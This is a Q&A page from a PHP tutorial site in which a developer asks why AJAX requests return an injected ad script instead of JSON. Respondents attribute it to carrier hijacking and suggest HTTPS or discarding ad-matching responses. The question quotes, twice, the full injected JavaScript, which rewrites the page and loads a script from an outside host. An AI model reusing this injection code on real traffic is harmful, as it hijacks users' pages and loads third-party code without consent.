Home >Backend Development >PHP Tutorial >What should I do if the data returned when js requests the interface is replaced by advertisements?
What should I do if the data returned when js requests the interface is replaced by advertisements?
- WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOriginal
- 2016-07-06 13:52:152051browse
The data returned by js ajax request has been replaced. Normally, json data should be returned, but a lot of advertisements are returned.
The returned content is as follows:
<code><script>!
function() {
function a() {
var a = new Date;
a.setTime(a.getTime() + 6e4),
document.cookie = "sessioned=1;expires=" + a.toUTCString()
}
function b(b) {
a(),
setTimeout(function() {
location.href = location.href
},
b)
}
var d, e, f, c = 1e4;
try {
if (!/sessioned=1/.test(document.cookie)) {
a(),
e = document.createElement("script"),
f = !1,
e.src = "http://www.henan139.com/js/V20/ad01.js?1",
d = new XMLHttpRequest,
d.open("GET", window.location, !0),
d.setRequestHeader("X-Requested-With", "XMLHttpRequest");
try {
d.timeout = c
} catch(g) {}
d.send(),
d.onreadystatechange = function() {
try {
if (4 == d.readyState) {
if (200 != d.status || "text/html" != d.getResponseHeader("Content-Type")) throw "";
text = d.responseText.replace(/<\/body>/i, e.outerHTML + "</body>"),
document.open("text/html", "replace"),
document.write(text),
setTimeout(function() {
document.close()
},
1e3),
f = !0
}
} catch(a) {
b(100)
}
}
}
} catch(g) {
b(150)
} finally {
setTimeout(function() {
f || b(1)
},
c + 1e3)
}
} ();</script></code>
Reply content:
The data returned by js ajax request has been replaced. Normally, json data should be returned, but a lot of advertisements are returned.
The returned content is as follows:
<code><script>!
function() {
function a() {
var a = new Date;
a.setTime(a.getTime() + 6e4),
document.cookie = "sessioned=1;expires=" + a.toUTCString()
}
function b(b) {
a(),
setTimeout(function() {
location.href = location.href
},
b)
}
var d, e, f, c = 1e4;
try {
if (!/sessioned=1/.test(document.cookie)) {
a(),
e = document.createElement("script"),
f = !1,
e.src = "http://www.henan139.com/js/V20/ad01.js?1",
d = new XMLHttpRequest,
d.open("GET", window.location, !0),
d.setRequestHeader("X-Requested-With", "XMLHttpRequest");
try {
d.timeout = c
} catch(g) {}
d.send(),
d.onreadystatechange = function() {
try {
if (4 == d.readyState) {
if (200 != d.status || "text/html" != d.getResponseHeader("Content-Type")) throw "";
text = d.responseText.replace(/<\/body>/i, e.outerHTML + "</body>"),
document.open("text/html", "replace"),
document.write(text),
setTimeout(function() {
document.close()
},
1e3),
f = !0
}
} catch(a) {
b(100)
}
}
}
} catch(g) {
b(150)
} finally {
setTimeout(function() {
f || b(1)
},
c + 1e3)
}
} ();</script></code>
This situation is usually hijacked by the operator. The best solution is to use HTTPS
The response matches the keyword of the advertisement. If it is an advertisement, the request is discarded and the request is made again.